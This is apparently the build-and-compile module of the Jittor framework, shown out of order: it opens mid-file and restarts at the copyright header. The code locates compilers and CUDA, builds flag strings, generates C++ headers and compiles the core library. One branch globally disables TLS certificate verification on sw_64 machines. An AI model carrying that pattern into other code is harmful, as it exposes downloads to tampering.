pyjt_def_{bname}(PyObject* m);") gen_src = insert_anchor(gen_src, "init_module(PyModuleDef* mdef, PyObject* m) {", f"jittor::pyjt_def_{bname}(m);") with open(gen_head_fname, "w") as f: f.write(gen_src) LOG.vvv(f"Build custum ops lib:{gen_lib}") LOG.vvvv(f"Build sources:{builds}") compile(cc_path, extra_flags+cc_flags+opt_flags+includes, builds, gen_lib) # add python path and import LOG.vvv(f"Import custum ops lib:{gen_lib}") lib_path = os.path.join(cache_path, "custom_ops") if lib_path not in os.sys.path: os.sys.path.append(lib_path) # unlock scope when initialize with lock.unlock_scope(): with jit_utils.import_scope(dlopen_flags): exec(f"import {gen_name}") mod = locals()[gen_name] if return_module: return mod return mod.ops def get_full_path_of_executable(name): full_path = os.path.abspath(name) while os.path.islink(full_path): full_path = os.path.realpath(full_path) if os.path.isfile(full_path) and os.access(full_path, os.X_OK): return full_path return get_full_path_of_executable(find_exe(name)) def compile_extern(): # compile llvm passes if cc_type != "clang" or platform.system() != 'Linux': return global kernel_opt_flags cache_path_llvm = os.path.join(cache_path, "llvm") jittor_path_llvm = os.path.join(jittor_path, "extern", "llvm") clang_dir = os.path.dirname(get_full_path_of_executable(cc_path)) assert clang_dir.endswith("bin") and "llvm" in clang_dir, f"Wrong clang_dir: {clang_dir}" llvm_include = os.path.abspath(os.path.join(clang_dir, "..", "include")) assert os.path.isdir(llvm_include), "LLVM include path not found" make_cache_dir(cache_path_llvm) files = os.listdir(jittor_path_llvm) # test_pass.cc is used for test link problem of llvm pass plugin test_pass_path = os.path.join(cache_path_llvm, "test_pass.cc") with open(test_pass_path, 'w') as f: f.write("int main() {return 0;}") # -fno-rtti fix link error # -Wl,-znodelete fix segfault # https://github.com/sampsyo/llvm-pass-skeleton/issues/7#issuecomment-401834287 # -D_GLIBCXX_USE_CXX11_ABI=0 fix undefined symbol: createPrinterPass # https://stackoverflow.com/questions/37366291/undefined-symbol-for-self-built-llvm-opt # try different flags try_flags = [ " -Wl,-znodelete -D_GLIBCXX_USE_CXX11_ABI=0 ", " -Wl,-znodelete ", ] found_flags_id = -1 for fname in files: for i, flag in enumerate(try_flags): if found_flags_id != -1 and found_flags_id != i: continue so_name = os.path.join(cache_path_llvm, os.path.splitext(fname)[0]+f".{i}.so") compile( cc_path, f"{cc_flags} {opt_flags} {flag} -I'{llvm_include}'", [os.path.join(jittor_path_llvm, fname)], so_name ) # if not found available flags, we test it. if found_flags_id == -1: try: s = run_cmd( f"{cc_path} {cc_flags} -Xclang -load -Xclang '{so_name}' {test_pass_path}", cache_path_llvm, print_error=False ) except Exception as e: LOG.v(f"Try flag {flag} failed: {e}") continue found_flags_id = i kernel_opt_flags += f" -Xclang -load -Xclang '{so_name}' " break else: LOG.w("Clang is used, but LLVM pass plugin is unable to link.") break LOG.vv(f"Compile extern llvm passes: {str(files)}") def check_cuda(): if not nvcc_path: return global cc_flags, has_cuda, core_link_flags, cuda_dir, cuda_lib, cuda_include, cuda_home, cuda_bin cuda_dir = os.path.dirname(get_full_path_of_executable(nvcc_path)) cuda_bin = cuda_dir cuda_home = os.path.abspath(os.path.join(cuda_dir, "..")) # try default nvidia-cuda-toolkit in Ubuntu 20.04 # assert cuda_dir.endswith("bin") and "cuda" in cuda_dir.lower(), f"Wrong cuda_dir: {cuda_dir}" cuda_include = os.path.abspath(os.path.join(cuda_dir, "..", "include")) cuda_lib = os.path.abspath(os.path.join(cuda_dir, "..", "lib64")) if nvcc_path == "/usr/bin/nvcc": # this nvcc is install by package manager cuda_lib = "/usr/lib/x86_64-linux-gnu" cuda_include2 = os.path.join(jittor_path, "extern","cuda","inc") cc_flags += f" -DHAS_CUDA -I\"{cuda_include}\" -I\"{cuda_include2}\" " if os.name == 'nt': cuda_lib = os.path.abspath(os.path.join(cuda_dir, "..", "lib", "x64")) # cc_flags += f" \"{cuda_lib}\\cudart.lib\" " cuda_lib_path = glob.glob(cuda_bin+"/cudart64*")[0] cc_flags += f" -lcudart -L\"{cuda_lib}\" -L\"{cuda_bin}\" " dll = ctypes.CDLL(cuda_lib_path, dlopen_flags) ret = dll.cudaDeviceSynchronize() assert ret == 0 else: cc_flags += f" -lcudart -L\"{cuda_lib}\" " # ctypes.CDLL(cuda_lib+"/libcudart.so", import_flags) ctypes.CDLL(cuda_lib+"/libcudart.so", dlopen_flags) has_cuda = 1 def check_cache_compile(): files = [ "src/utils/cache_compile.cc", "src/utils/log.cc", "src/utils/tracer.cc", "src/utils/jit_utils.cc", "src/utils/str_utils.cc", ] if os.name == 'nt': files = [ x.replace('/', '\\') for x in files ] global jit_utils_core_files jit_utils_core_files = files recompile = compile(cc_path, cc_flags+f" {opt_flags} ", files, jit_utils.cache_path+'/jit_utils_core'+extension_suffix, True) if recompile and jit_utils.cc: LOG.e("jit_utils updated, please rerun your command.") sys.exit(0) if not jit_utils.cc: with jit_utils.import_scope(import_flags): jit_utils.try_import_jit_utils_core() assert jit_utils.cc # recompile, generate cache key compile(cc_path, cc_flags+f" {opt_flags} ", files, jit_utils.cache_path+'/jit_utils_core'+extension_suffix, True) def env_or_try_find(name, bname): if name in os.environ: path = os.environ[name] if path != "": version = jit_utils.get_version(path) LOG.i(f"Found {bname}{version} at {path}") return path return try_find_exe(bname) def try_find_exe(*args): try: return find_exe(*args) except: LOG.v(f"{args[0]} not found.") return "" def check_pybt(gdb_path, python_path): if gdb_path=='' or python_path=='': return False return True # TODO: prev we use below code to check has py-bt or nor # but it is too slow, so we comment it, # find a better way to check py-bt exist # ret = sp.getoutput(f"{gdb_path} --batch {python_path} -ex 'help py-bt'") # if 'python frame' in ret: # LOG.v("py-bt found in gdb.") # return True # return False def check_debug_flags(): global is_debug is_debug = 0 if os.environ.get("debug")=="1": is_debug = 1 global cc_flags cc_flags += " -g -DNODE_MEMCHECK " cc_flags = " " # os.RTLD_NOW | os.RTLD_GLOBAL cause segfault when import torch first import_flags = os.RTLD_NOW | os.RTLD_GLOBAL if platform.system() == 'Linux': import_flags |= os.RTLD_DEEPBIND # if cc_type=="icc": # # weird link problem, icc omp library may conflict and cause segfault # import_flags = os.RTLD_NOW | os.RTLD_GLOBAL dlopen_flags = os.RTLD_NOW | os.RTLD_GLOBAL if platform.system() == 'Linux': import_flags |= os.RTLD_DEEPBIND with jit_utils.import_scope(import_flags): jit_utils.try_import_jit_utils_core() jittor_path = find_jittor_path() check_debug_flags() sys.path.append(cache_path) LOG.i(f"Jittor({__version__}) src: {jittor_path}") LOG.i(f"{jit_utils.cc_type} at {jit_utils.cc_path}{jit_utils.get_version(jit_utils.cc_path)}") LOG.i(f"cache_path: {cache_path}") with jit_utils.import_scope(import_flags): jit_utils.try_import_jit_utils_core() python_path = sys.executable # sometime python do not return the correct sys executable # this will happend when multiple python version installed ex_python_path = python_path + '.' + str(sys.version_info.minor) if os.path.isfile(ex_python_path): python_path = ex_python_path # if jtcuda is already installed nvcc_path = None if install_cuda.has_installation() or os.name == 'nt': nvcc_path = install_cuda.install_cuda() if nvcc_path: nvcc_path = try_find_exe(nvcc_path) # check system installed cuda if not nvcc_path: nvcc_path = env_or_try_find('nvcc_path', 'nvcc') or \ try_find_exe('/usr/local/cuda/bin/nvcc') or \ try_find_exe('/usr/bin/nvcc') or \ try_find_exe('/opt/cuda/bin/nvcc') # if system has no cuda, install jtcuda if not nvcc_path: nvcc_path = install_cuda.install_cuda() if nvcc_path: nvcc_path = try_find_exe(nvcc_path) if nvcc_path is None: nvcc_path = "" gdb_path = env_or_try_find('gdb_path', 'gdb') addr2line_path = try_find_exe('addr2line') has_pybt = check_pybt(gdb_path, python_path) if nvcc_path: # gen cuda key for cache_path cu = "cu" v = jit_utils.get_version(nvcc_path)[1:-1] nvcc_version = list(map(int,v.split('.'))) cu += v try: r, s = sp.getstatusoutput(f"{sys.executable} -m jittor_utils.query_cuda_cc") if r==0: s = sorted(list(set(s.strip().split()))) cu += "_sm_" + "_".join(s) if "cuda_arch" not in os.environ: os.environ["cuda_arch"] = " ".join(cu) except: pass LOG.i("cuda key:", cu) cache_path = os.path.join(cache_path, cu) sys.path.append(cache_path) def check_clang_latest_supported_cpu(): output = run_cmd('clang --print-supported-cpus') apple_cpus = [l.strip() for l in output.split('\n') if 'apple-a' in l] apple_cpus_id = max([int(cpu[7:]) for cpu in apple_cpus]) return f'apple-a{apple_cpus_id}' # cc_flags += " -Wall -Werror -Wno-unknown-pragmas -std=c++14 -fPIC " cc_flags += " -Wall -Wno-unknown-pragmas -std=c++14 -fPIC " # 1. Arch/CPU specific optimization if platform.machine() in ["x86_64", "AMD64"]: cc_flags += " -march=native " elif platform.machine() == 'arm64' and platform.system() == "Darwin": cc_flags += f" -mcpu={check_clang_latest_supported_cpu()} " cc_flags += " -fdiagnostics-color=always " # 2. Non standard include path if platform.system() == 'Darwin' and platform.machine() == 'arm64': cc_flags += " -I/opt/homebrew/include " # 3. User specified flags if "cc_flags" in os.environ: cc_flags += os.environ["cc_flags"] + ' ' cc_flags += " -lstdc++ -ldl -shared " if platform.system() == 'Darwin': # TODO: if not using apple clang, there is no need to add -lomp cc_flags += "-undefined dynamic_lookup -lomp " if platform.machine() == "arm64": cc_flags += " -L/opt/homebrew/lib " opt_flags = "" py_include = jit_utils.get_py3_include_path() LOG.v(f"py_include: {py_include}") extension_suffix = jit_utils.get_py3_extension_suffix() lib_suffix = extension_suffix.rsplit(".", 1)[0] LOG.v(f"extension_suffix: {extension_suffix}") so = ".so" if os.name != 'nt' else ".dll" kernel_opt_flags = os.environ.get("kernel_flags", "") + opt_flags if platform.system() == 'Darwin': # TODO: if not using apple clang, cannot add -Xpreprocessor kernel_opt_flags += " -Xpreprocessor -fopenmp " elif cc_type != 'cl': kernel_opt_flags += " -fopenmp " def fix_cl_flags(cmd): output = shsplit(cmd) output2 = [] libpaths = [] for s in output: if s.startswith("-l") and ("cpython" in s or "lib" in s): if platform.system() == 'Darwin': fname = s[2:] + ".so" for path in reversed(libpaths): full = os.path.join(path, fname).replace("\"", "") if os.path.isfile(full): output2.append(full) break else: output2.append(s) else: output2.append(f"-l:{s[2:]}.so") elif s.startswith("-L"): libpaths.append(s[2:]) output2.append(f"{s} -Wl,-rpath,{s[2:]}") else: output2.append(s) return " ".join(output2) if os.name == 'nt': if cc_type == 'g++': pass elif cc_type == 'cl': py3_link_path = os.path.join( os.path.dirname(sys.executable), "libs", ) cc_flags = remove_flags(cc_flags, ["-f", "-m"]) cc_flags = cc_flags.replace("-std=c++14", "-std=c++17") cc_flags = cc_flags.replace("-lstdc++", "") cc_flags = cc_flags.replace("-ldl", "") cc_flags += f" -L\"{py3_link_path}\" -lpython3{sys.version_info.minor} " cc_flags += " -EHa -MD " import jittor_utils if jittor_utils.msvc_path: mp = jittor_utils.msvc_path cc_flags += f' -nologo -I"{mp}\\VC\\include" -I"{mp}\\win10_kits\\include\\ucrt" -I"{mp}\\win10_kits\\include\\shared" -I"{mp}\\win10_kits\\include\\um" -DNOMINMAX ' cc_flags += f' -L"{mp}\\VC\\lib" -L"{mp}\\win10_kits\\lib\\um\\x64" -L"{mp}\\win10_kits\\lib\\ucrt\\x64" ' win_libpaths = {} def fix_cl_flags(cmd): cmd = cmd.replace(".o ", ".obj ") cmd = cmd.replace(".o\"", ".obj\"") if cmd.endswith(".o"): cmd += "bj" if " -o " in cmd: if " -shared " in cmd: cmd = cmd.replace(" -o ", " -Fe: ") output = shsplit(cmd.split("-Fe:")[1].strip())[0] base_output = os.path.basename(output).split('.')[0] cmd += f" -DEF:\"{output}.def\" -IGNORE:4102 -IGNORE:4197 -IGNORE:4217 " elif " -c -o " in cmd: cmd = cmd.replace(" -c -o ", " -c -Fo: ") flags = shsplit(cmd) output = [] output2 = [] for f in flags: if f.startswith("-link"): pass elif f.startswith("-l"): output2.append(f[2:]+".lib") elif f.startswith("-LIB"): output2.append(f) elif f.startswith("-LD"): output.append(f) elif f.startswith("-L"): path = f[2:].replace("\"", "") if path not in win_libpaths: win_libpaths[path] = 1 os.add_dll_directory(path) os.environ["PATH"] = f";{path};" + os.environ["PATH"] output2.append("-LIBPATH:"+f[2:]) elif ".lib" in f: output2.append(f) elif f.startswith("-DEF:"): output2.append(f) elif f.startswith("-W") or f.startswith("-f"): pass elif f.startswith("-std="): output.append(f.replace("=", ":")) else: output.append(f) cmd = " ".join(output) if len(output2): cmd += " -link " + " ".join(output2) cmd = cmd.replace("-include", "-FI") cmd = cmd.replace("-shared", "-LD") return cmd if ' -O' not in cc_flags: opt_flags += " -O2 " kernel_opt_flags += " -Ofast " lto_flags = "" if os.environ.get("enable_lto") == "1": if cc_type == "icc": lto_flags = " -flto -ipo -ipo-c " elif cc_type == "g++": lto_flags = " -flto -fuse-linker-plugin " else: lto_flags = " -flto " make_cache_dir(cache_path) make_cache_dir(os.path.join(cache_path, "jit")) make_cache_dir(os.path.join(cache_path, "obj_files")) make_cache_dir(os.path.join(cache_path, "gen")) make_cache_dir(os.path.join(cache_path, "tmp")) ck_path = os.path.join(cache_path, "checkpoints") make_cache_dir(ck_path) # build cache_compile cc_flags += f" -I\"{os.path.join(jittor_path, "src")}\" " cc_flags += py_include check_cache_compile() LOG.v(f"Get cache_compile: {jit_utils.cc}") # check cuda has_cuda = 0 check_cuda() nvcc_flags = os.environ.get("nvcc_flags", "") if has_cuda: nvcc_flags += cc_flags def convert_nvcc_flags(nvcc_flags): # nvcc don't support -Wall option if os.name == 'nt': nvcc_flags = nvcc_flags.replace("-fp:", "-Xcompiler -fp:") nvcc_flags = nvcc_flags.replace("-EH", "-Xcompiler -EH") nvcc_flags = nvcc_flags.replace("-M", "-Xcompiler -M") nvcc_flags = nvcc_flags.replace("-nologo", "") nvcc_flags = nvcc_flags.replace("-std:", "-std=") nvcc_flags = nvcc_flags.replace("-Fo:", "-o") nvcc_flags = nvcc_flags.replace("-LD", "-shared") nvcc_flags = nvcc_flags.replace("-LIBPATH:", "-L") nvcc_flags = nvcc_flags.replace("-link", "") def func(x): if ".lib" not in x: return x x = x.replace("\"", "") a = os.path.dirname(x) b = os.path.basename(x) if not b.endswith(".lib"): return x return f"-L\"{a}\" -l{b[:-4]}" nvcc_flags = map_flags(nvcc_flags, func) if nvcc_version >= [11,4]: nvcc_flags = nvcc_flags.replace("-std=c++17", "-std=c++14 -Xcompiler -std:c++14") else: nvcc_flags = nvcc_flags.replace("-std=c++17", "") nvcc_flags = nvcc_flags.replace("-Wall", "") nvcc_flags = nvcc_flags.replace("-Wno-unknown-pragmas", "") nvcc_flags = nvcc_flags.replace("-fopenmp", "") nvcc_flags = nvcc_flags.replace("-march", "-Xcompiler -march") nvcc_flags = nvcc_flags.replace("-Werror", "") nvcc_flags = nvcc_flags.replace("-fPIC", "-Xcompiler -fPIC") nvcc_flags = nvcc_flags.replace("-fdiagnostics", "-Xcompiler -fdiagnostics") nvcc_flags += f" -x cu --cudart=shared -ccbin=\"{cc_path}\" --use_fast_math " # nvcc warning is noise nvcc_flags += " -w " nvcc_flags += f" -I\"{os.path.join(jittor_path, "extern/cuda/inc")}\" " if os.environ.get("cuda_debug", "0") == "1": nvcc_flags += " -G " return nvcc_flags nvcc_flags = convert_nvcc_flags(nvcc_flags) # build core gen_jit_flags() gen_jit_tests() op_headers = glob.glob(jittor_path+"/src/ops/**/*op.h", recursive=True) jit_src = gen_jit_op_maker(op_headers) LOG.vvvv(jit_src) with open(os.path.join(cache_path, "gen", "jit_op_maker.h"), 'w') as f: f.write(jit_src) cc_flags += f' -I\"{cache_path}\" -L\"{cache_path}\" -L\"{jit_utils.cache_path}\" ' # gen pyjt pyjt_gen_src = pyjt_compiler.compile(cache_path, jittor_path) # initialize order: # 1. registers # 2. generate source # 3. op_utils # 4. other files2 = pyjt_gen_src ext_args = 'c[cu]' if has_cuda else 'cc' files4 = glob.glob(jittor_path+"/src/**/*."+ext_args, recursive=True) files4 = [ f[len(jittor_path)+1:] for f in files4 ] # files4 = run_cmd('find -L src | grep '+grep_args, jittor_path).splitlines() at_beginning = [ "src/ops/op_utils.cc", "src/event_queue.cc", "src/mem/allocator/sfrl_allocator.cc", "src/mem/allocator.cc", "src/misc/nano_string.cc", ] at_last = [ "src/profiler/profiler.cc", "src/executor.cc", ] if os.name == 'nt': at_beginning = [ x.replace('/','\\') for x in at_beginning ] at_last = [ x.replace('/','\\') for x in at_last ] for i in range(len(at_beginning)): files4.remove(at_beginning[i]) files4.insert(i, at_beginning[i]) for v in at_last: files4.remove(v) files4.append(v) registers = [ name for name in files4 if "register" in name ] for name in registers: files4.remove(name) files = registers + files2 + files4 for file in jit_utils_core_files: files.remove(file) LOG.vv("compile order:", files) if platform.system() == 'Linux': libname = {"clang":"omp", "icc":"iomp5", "g++":"gomp"}[cc_type] libname = ctypes.util.find_library(libname) assert libname is not None, "openmp library not found" ctypes.CDLL(libname, os.RTLD_NOW | os.RTLD_GLOBAL) if platform.machine()=='sw_64': import ssl ssl._create_default_https_context = ssl._create_unverified_context data_gz_path = os.path.join(jittor_path, "utils", "data.gz") use_data_gz = os.path.isfile(data_gz_path) if os.environ.get("use_data_gz", "1") == "0": use_data_gz = False if use_data_gz: import gzip with gzip.open(data_gz_path, 'rb') as f: data = f.read() md5 = hashlib.md5(data).hexdigest() target_md5 = None data_gz_md5_path = os.path.join(cache_path, "data.md5") if os.path.isfile(data_gz_md5_path): with open(data_gz_md5_path, 'r') as f: target_md5 = f.read() data_o_path = os.path.join(cache_path, "data.o") if target_md5 != md5: data_s_path = os.path.join(cache_path, "data.cc") with open(data_s_path, "w") as f: f.write(data.decode("utf8")) dflags = (cc_flags+opt_flags)\ .replace("-Wall", "") \ .replace("-Werror", "") \ .replace("-shared", "") vdp = os.path.join(jittor_path, "src", "utils", "vdp") run_cmd(fix_cl_flags(f"{cc_path} {dflags} -include \"{vdp}\" \"{data_s_path}\" -c -o \"{data_o_path}\"")) os.remove(data_s_path) with open(data_gz_md5_path, 'w') as f: f.write(md5) files.append(data_o_path) files = [f for f in files if "__data__" not in f] cc_flags += f" -l\"jit_utils_core{lib_suffix}\" " compile(cc_path, cc_flags+opt_flags, files, 'jittor_core'+extension_suffix) cc_flags += f" -l\"jittor_core{lib_suffix}\" " # TODO: move to compile_extern.py # compile_extern() with jit_utils.import_scope(import_flags): import jittor_core as core flags = core.Flags() if has_cuda: nvcc_flags = convert_nvcc_flags(cc_flags) nvcc_version = list(jit_utils.get_int_version(nvcc_path)) max_arch = 1000 if nvcc_version < [11,]: max_arch = 75 elif nvcc_version < [11,1]: max_arch = 80 if len(flags.cuda_archs): min_arch = 30 archs = [] for arch in flags.cuda_archs: if arch<min_arch: LOG.w(f"CUDA arch({arch})<{min_arch} is not supported") continue if arch>max_arch: LOG.w(f"CUDA arch({arch})>{max_arch} will be backward-compatible") arch = max_arch archs.append(arch) flags.cuda_archs = archs nvcc_flags += f" -arch=compute_{min(archs)} " nvcc_flags += ''.join(map(lambda x:f' -code=sm_{x} ', archs)) flags.cc_path = cc_path flags.cc_type = cc_type flags.cc_flags = cc_flags + kernel_opt_flags flags.nvcc_path = nvcc_path flags.nvcc_flags = nvcc_flags flags.python_path = python_path flags.cache_path = cache_path flags.jittor_path = jittor_path flags.gdb_path = gdb_path flags.addr2line_path = addr2line_path flags.has_pybt = has_pybt core.set_lock_path(lock.lock_path)
# *************************************************************** # Copyright (c) 2021 Jittor. All Rights Reserved. # Maintainers: Dun Liang <randonlang@gmail.com>. # This file is subject to the terms and conditions defined in # file 'LICENSE.txt', which is part of this source code package. # *************************************************************** import subprocess as sp import os import re import sys import glob import inspect import datetime import threading import platform import ctypes import platform from ctypes import cdll from ctypes.util import find_library import jittor_utils as jit_utils from jittor_utils import LOG, run_cmd, cache_path, find_exe, cc_path, cc_type, cache_path from . import pyjt_compiler from jittor_utils import lock from jittor_utils import install_cuda from jittor import __version__ import hashlib def find_jittor_path(): return os.path.dirname(__file__) def make_cache_dir(cache_path): if not os.path.isdir(cache_path): LOG.i(f"Create cache dir: {cache_path}") os.mkdir(cache_path) def shsplit(s): s1 = s.split(' ') s2 = [] count = 0 for s in s1: nc = s.count('"') + s.count('\'') if count&1: count += nc s2[-1] += " " s2[-1] += s else: count = nc s2.append(s) return s2 def remove_flags(flags, rm_flags): flags = shsplit(flags) output = [] for s in flags: ss = s.replace("\"", "") for rm in rm_flags: if ss.startswith(rm) or ss.endswith(rm): break else: output.append(s) return " ".join(output) def moveback_flags(flags, rm_flags): flags = shsplit(flags) output = [] output2 = [] for s in flags: ss = s.replace("\"", "") for rm in rm_flags: if ss.startswith(rm) or ss.endswith(rm): output2.append(s) break else: output.append(s) return " ".join(output+output2) def map_flags(flags, func): flags = shsplit(flags) output = [] for s in flags: output.append(func(s)) return " ".join(output) def compile(compiler, flags, inputs, output, combind_build=False, cuda_flags=""): def do_compile(cmd): if jit_utils.cc: return jit_utils.cc.cache_compile(cmd, cache_path, jittor_path) else: run_cmd(cmd) return True base_output = os.path.basename(output).split('.')[0] if os.name == 'nt': # windows do not combind build, need gen def combind_build = False # windows need xxxx.lib afile = output.rsplit('.', 1)[0] + ".lib" afile = os.path.join(cache_path, afile) if cc_type != 'cl': # initialize order in windows seems reversed inputs = list(inputs[::-1]) link = link + f' -Wl,--export-all-symbols,--out-implib,"{afile}" ' if not os.path.isabs(output): output = os.path.join(cache_path, output) # don't recompile object file in inputs obj_files = [] ex_obj_files = [] new_inputs = [] for name in inputs: if name[-1] in 'oab': ex_obj_files.append(name) else: new_inputs.append(os.path.join(jittor_path, name)) obj_files.append(os.path.join( cache_path, "obj_files", os.path.basename(name)+".o")) inputs = new_inputs cm = lambda s: f"\"{s}\"" cms = lambda arr: [f"\"{s}\"" for s in arr ] if len(inputs) == 1 or combind_build: cmd = f"\"{compiler}\" {' '.join(cms(inputs))} {flags} -o {cm(output)}" return do_compile(fix_cl_flags(cmd)) # split compile object file and link # remove -l -L flags when compile object files oflags = remove_flags(flags, ['-l', '-L', '-Wl,', '.lib', '-shared']) cmds = [] for input, obj_file in zip(inputs, obj_files): cc = compiler nflags = oflags cmd = f"{cm(input)} {nflags} {lto_flags} -c -o {cm(obj_file)}" if input.endswith(".cu"): if has_cuda: cmd = f"\"{nvcc_path}\" {cuda_flags} {cmd}" cmd = convert_nvcc_flags(fix_cl_flags(cmd)) else: continue else: cmd = f"\"{cc}\" {cmd}" cmd = fix_cl_flags(cmd) if "nan_checker" in input: # nan checker needs to disable fast_math cmd = cmd.replace("--use_fast_math", "") cmd = cmd.replace("-Ofast", "-O2") cmds.append(cmd) jit_utils.run_cmds(cmds, cache_path, jittor_path, "Compiling "+base_output) obj_files += ex_obj_files if os.name == 'nt': dumpdef_path = os.path.join(jittor_path, "utils", "dumpdef.py") cmd = f"\"{sys.executable}\" \"{dumpdef_path}\" {' '.join(cms(obj_files))} -Fo: \"{output}.def\"" do_compile(fix_cl_flags(cmd)) cmd = f"\"{compiler}\" {' '.join(cms(obj_files))} -o {cm(output)} {flags} {lto_flags}" return do_compile(fix_cl_flags(cmd)) def gen_jit_tests(): all_src = glob.glob(jittor_path+"/src/**/*.cc", recursive=True) jit_declares = [] re_def = re.compile("JIT_TEST\\((.*?)\\)") names = set() test_defs = [] for src_name in all_src: with open(src_name, 'rb') as f: src = f.read().decode('utf8') defs = re_def.findall(src) for name in defs: LOG.vv(f"Find test {name} from {src_name}") assert name not in names, f"Conflict test name {name}" names.add(name) jit_declares.append(f"JIT_TEST({name});") test_defs.append(f""" /* From {src_name} */ // @pyjt({name}) static inline void test_{name}() {{ jit_test_{name}(); }} """) jit_declares = "\n ".join(jit_declares) jit_src = f""" #pragma once #include "common.h" void expect_error(std::function<void()> func) {{ try {{ func(); }} catch (...) {{ return; }} CHECK(0) << "Missing error"; }} namespace jittor {{ {jit_declares} // @pyjt(tests) // @attrs(submodule) namespace tests {{ {"".join(test_defs)} }} }} // jittor """ LOG.vvvv(jit_src) with open(os.path.join(cache_path, "gen", "jit_tests.h"), 'w') as f: f.write(jit_src) def gen_jit_flags(): all_src = glob.glob(jittor_path+"/src/**/*.cc", recursive=True) jit_declares = [] re_def = re.compile("DEFINE_FLAG(_WITH_SETTER)?\\((.*?)\\);", re.DOTALL) flags_defs = [] visit = {} for src_name in all_src: with open(src_name, 'rb') as f: src = f.read().decode("utf8") defs = re_def.findall(src) for _, args in defs: args = args.split(",") type = args[0].strip() name = args[1].strip() if not has_cuda and "cuda" in name and name!="use_cuda": continue default = args[2].strip() doc = ",".join(args[3:]) doc = eval(f"({doc})") LOG.vv(f"Find define {name} from {src_name}") if name in visit: continue visit[name] = 1 jit_declares.append(f"DECLARE_FLAG({type}, {name});") flags_defs.append(f""" /* {name}(type:{type}, default:{default}): {doc} */ // @pyjt(__get__{name}) {type} _get_{name}() {{ return {name}; }} // @pyjt(__set__{name}) void _set_{name}({type} v) {{ set_{name}(v); }} {f'''// @pyjt(__set__{name}) void _set_{name}(bool v) {{ set_{name}(v); }} ''' if type=="int" else ""} """) jit_declares = "\n ".join(jit_declares) jit_src = f""" #include "utils/flags.h" namespace jittor {{ {jit_declares} // @pyjt(Flags) struct _Flags {{ // @pyjt(__init__) _Flags() {{}} {"".join(flags_defs)} }}; }} // jittor """ LOG.vvvv(jit_src) with open(os.path.join(cache_path, "gen", "jit_flags.h"), 'w') as f: f.write(jit_src) def gen_jit_op_maker(op_headers, export=False, extra_flags=""): def add_src( cc_func_name, cc_args, op_name, op_args, src, pybind_name, py_args, jit_cc_src, doc_string, attrs ): has_ir = set(["add", "sub", "mul", "matmul", "truediv", "floordiv", "mod", "divmod", "pow", "lshift", "rshift", "and", "xor", "or"]) pybind_names = [ s.strip() for s in pybind_name.split(",")] cc_make_args = [ arg.replace("VarHolder*", "Var*") for arg in cc_args ] op_make_args = [ arg.replace("->var", "") for arg in op_args ] py_args = [ arg.replace("Var*", "VarHolder*") for arg in py_args ] op_args = [] cc_args_with_default = [] for i, arg in enumerate(cc_args): pre_arg = arg.split()[-1].split('=')[0] op_arg = None if arg.startswith("VarHolder*"): op_arg = pre_arg+"->var" elif arg.startswith("vector<VarHolder*>"): op_arg = f"convert({pre_arg})" if "&&" in arg: if op_arg == None: op_arg = "move("+pre_arg+")" op_make_args[i] = "move("+pre_arg+")" if op_arg==None: op_arg = pre_arg op_args.append(op_arg) py_arg = py_args[i] if "_a=" not in py_arg: cc_args_with_default.append(arg) continue py_arg = py_arg.split("_a=")[1] cc_args_with_default.append(arg + "=" + py_arg) cc_args = cc_args_with_default # steps of Op creation: # 1. new op # 2. new output var (create_output in op constructor) # 3. take over op's output VarPtr from outputs_holder # 4. set op's output # 5. set op's input # 6. infer shape(op->init()) if "multiple_outputs" not in attrs: jit_cc_src.append(f""" VarPtr make_{cc_func_name}({", ".join(cc_make_args)}) {{ auto _op = new {op_name}({", ".join(op_make_args)}); if (_op->outputs_holder.size() != 1) {{ delete _op; LOGf << "Wrong output size of" << \"{op_name}\"; }} if (_op->flags.get(NodeFlags::_forwarded)) {{ VarPtr _out(move(_op->outputs_holder[0])); delete _op; return _out; }} _op->outputs_holder[0]->set_inputs({{_op}}); VarPtr _out(move(_op->outputs_holder[0])); {src.replace("->var","")}; _op->init(); return _out; }} """) else: jit_cc_src.append(f""" vector<VarPtr> make_{cc_func_name}({", ".join(cc_make_args)}) {{ auto _op = new {op_name}({", ".join(op_make_args)}); if (_op->flags.get(NodeFlags::_forwarded)) {{ vector<VarPtr> _outs = move(_op->outputs_holder); delete _op; return _outs; }} vector<VarPtr> _outs = move(_op->outputs_holder); for (uint i=0; i<_outs.size(); i++) _outs[i]->set_inputs({{_op}}); {src.replace("->var","")}; _op->init(); return _outs; }} """) if pybind_name == 'None': return pyjt_names = [] for pybind_name in pybind_names: if pybind_name.startswith("__"): pyjt_names.append("Var."+pybind_name) else: pyjt_names.append(pybind_name) if len(cc_args)>0 and cc_args[0].startswith("VarHolder* "): pyjt_names.append("Var."+pybind_name) if "multiple_outputs" in attrs: jit_cc_src.append(f""" /*{doc_string}*/ // @pyjt({",".join(pyjt_names)}) vector<VarHolder*> {cc_func_name}({", ".join(cc_args)}) {{ { f'return make_vh_vector(make_{cc_func_name}({", ".join(op_args)}));' if "replace_outputs" not in attrs else f'''auto rt = make_vh_vector(make_{cc_func_name}({", ".join(op_args)})); ASSERT(rt.size() == outputs.size()); for (int i=0; i<outputs.size(); i++) outputs[i]->assign(rt[i]); return rt; '''} }} """) else: jit_cc_src.append(f""" /*{doc_string}*/ // @pyjt({",".join(pyjt_names)}) VarHolder* {cc_func_name}({", ".join(cc_args)}) {{ return new VarHolder(make_{cc_func_name}({", ".join(op_args)})); }} """) need_ir_define = False ir_name = None for pybind_name in pybind_names: if pybind_name.startswith("__") and pybind_name[2:-2] in has_ir: need_ir_define = True assert ir_name is None ir_name = pybind_name[2:-2] if need_ir_define: assert len(cc_args)>0 and cc_args[0].startswith("VarHolder* ") this = cc_args[0].split()[-1] jit_cc_src.append(f""" // @pyjt(Var.__i{ir_name}__) // @attrs(return_self) VarHolder* i{cc_func_name}({", ".join(cc_args)}) {{ *{this} = make_{cc_func_name}({", ".join(op_args)}); return {this}; }} """) assert len(cc_args)>1 and cc_args[1].startswith("VarHolder* "), cc_args r_cc_args = [cc_args[1], cc_args[0]] + cc_args[2:] r_py_args = [py_args[1], py_args[0]] + py_args[2:] jit_cc_src.append(f""" VarHolder* r{cc_func_name}({", ".join(r_cc_args)}) {{ return new VarHolder(make_{cc_func_name}({", ".join(op_args)})); }} """) jit_cc_src = [] jit_headers = "" initer = [] pybind_reg = '(/\\*(.*?)\\*/\\s*)?(//\\s*@pybind\\(([^\\n]*)\\)\\s*)?' pybind_attrs_reg = pybind_reg + '(//\\s*@attrs\\(([^\\n]*)\\)\\s*)?' for header in op_headers: # xxx_xxx_op name = os.path.basename(header) name = 